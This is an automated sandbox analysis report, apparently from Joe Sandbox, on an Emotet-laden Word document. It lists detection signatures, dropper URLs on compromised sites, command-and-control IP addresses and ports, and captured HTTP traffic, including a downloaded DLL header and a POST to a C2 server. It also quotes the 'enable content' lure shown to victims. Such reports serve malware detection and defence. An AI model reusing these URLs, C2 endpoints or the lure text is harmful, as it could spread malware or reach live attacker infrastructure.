Analysis Report Arch_2021_717-1562532.doc

Overview

General Information

Sample Name: Arch_2021_717-1562532.doc
Analysis ID: 344339
MD5: d8358bce25bf7488068cfa9490205833
SHA1: 35c09dac297f82402a99de172600ba40d87c3ab7
SHA256: b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: Arch_2021_717-1562532.doc Virustotal: Detection: 16% Perma Link
Source: Arch_2021_717-1562532.doc ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shannared.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Jan 2021 12:33:15 GMTContent-Disposition: attachment; filename="O9TGnKaUCw.dll"Content-Transfer-Encoding: binarySet-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/Last-Modified: Tue, 26 Jan 2021 12:33:15 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: application/octet-streamX-Cacheable: YES:ForcedContent-Length: 631808Accept-Ranges: bytesDate: Tue, 26 Jan 2021 12:33:15 GMTAge: 0Vary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 84.232.229.24 84.232.229.24
Source: Joe Sandbox View IP Address: 192.169.223.13 192.169.223.13
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1DNT: 0Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/Content-Type: multipart/form-data; boundary=--------orf6DU5uUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 217.160.169.110:8080Content-Length: 5748Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shannared.com
Source: unknown HTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1DNT: 0Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/Content-Type: multipart/form-data; boundary=--------orf6DU5uUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 217.160.169.110:8080Content-Length: 5748Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Word
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Words: 8,758 I US I N@m 1
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5677
Source: unknown Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5576 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00771328 NtSetInformationKey, 8_2_00771328
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Kvmkgtcj\ Jump to behavior
Detected potential crypto function
